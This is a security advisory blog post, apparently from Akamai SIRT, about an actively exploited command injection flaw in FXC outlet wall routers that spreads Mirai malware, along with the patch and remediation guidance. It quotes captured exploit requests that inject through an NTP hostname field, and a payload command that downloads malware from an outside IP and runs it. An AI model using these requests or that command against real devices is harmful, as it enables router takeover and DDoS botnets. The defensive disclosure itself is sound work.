Actively Exploited Vulnerability in FXC Routers: Fixed, Patches Available
This blog post is an update to a previous post by the SIRT on the InfectedSlurs campaign.
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an update to the InfectedSlurs advisory series now that one of the affected vendors has released patched firmware versions and guidance.
The vulnerability has been given the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.
Among the affected routers are Future X Communications (FXC) AE1021 and AE1021PE outlet wall routers, running firmware versions 2.0.9 and earlier.
The malicious payloads captured in the wild install a Mirai-based malware with the intention of creating a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
Need to know
As part of the InfectedSlurs discovery, the SIRT uncovered a vulnerability in FXC AE1021 and AE1021PE outlet wall routers that are being actively exploited in the wild. This device is described as an outlet-based wireless LAN router for hotels and residential units. It is manufactured in Japan by FXC. This vulnerability has been assigned the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.
The impacted firmware versions are:
AE1021PE firmware version 2.0.9 and earlier
AE1021 firmware version 2.0.9 and earlier
The vendor (FXC) has released a patched version of the device's firmware that corrects the vulnerability. The vendor suggests device owners update to firmware version 2.0.10 as soon as possible. They also recommend owners do a factory reset of the device and change the default management screen login password on the first boot.
The vendor advisory can be found at https://www.fxc.jp/news/20231206 with an advisory also being published by JPCERT, which is located here https://jvn.jp/en/vu/JVNVU92152057/ (Japanese release: https://jvn.jp/vu/JVNVU92152057/).
Exploitation observed
The payloads identified in the wild involve the installation of a Mirai-based malware. The campaign is building a botnet aimed at facilitating DDoS attacks — the botnet itself was covered in detail in our initial post.
It’s hard to estimate how many devices in the wild are potentially compromisable or actively compromised because the captured attack payloads rely on the devices’ use of factory default authentication credentials.
Since the attacker must be authenticated, two unique interactions generated by the attacker were observed. We believe the first of these interactions is merely a fingerprinting attempt. The interaction targets the /cgi-bin/login.apply endpoint URL using default credentials (Figure 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Fig, 1: FXC outlet wall router authentication attempt
If the authentication is successful, an exploit payload is delivered to the /cgi-bin/action endpoint URL approximately three seconds later (Figure 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Fig. 2: FXC outlet wall router exploitation attempt
The raw exploit payloads captured in the wild attempt to leverage the OS command injection vulnerability to distribute a MIPS-compiled variant of Mirai (Figure 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Fig. 3: Remote code execution payloads observed in the wild
In our initial publication, the Akamai SIRT team provided an extensive list of IOCs, Snort rules, and YARA rules to help identify these exploit attempts in the wild and possible active infections on defender networks.
Conclusion
Internet of Things (IoT)–targeted campaigns result in countless instances in which everyday consumer devices are unwittingly enlisted in a number of malicious efforts. DDoS botnets and cryptomining schemes are just some of the potential outcomes that can happen completely unbeknownst to the consumer whose device is affected. In some cases, the user may not even know the credentials could be changed on these devices at all.
This revelation underscores the necessity for increased awareness and education regarding IoT best practices and the associated risks for the average consumer. The need for awareness isn’t exclusive to consumers — it also applies to manufacturers of these “set it and forget it” devices.
Basic security practices matter
The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.
Stay tuned
The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.
The Akamai SIRT would like to take a moment to thank CISA, US-CERT, JPCERT, and FXC for assistance with communications, coordination, identification, remediation, and disclosure efforts.
We would also like to thank Ryu Kuki, Takayuki Sasaki, and Katsunari Yoshioka of Yokohama National University for their diligent work. Although we didn’t get to work with them directly, it was brought to our attention that they had reported the same vulnerability to JPCERT and FXC at roughly the same time as our own reports. It’s always great to find fellow defenders taking active roles in making the internet a better and more secure place for everyone.
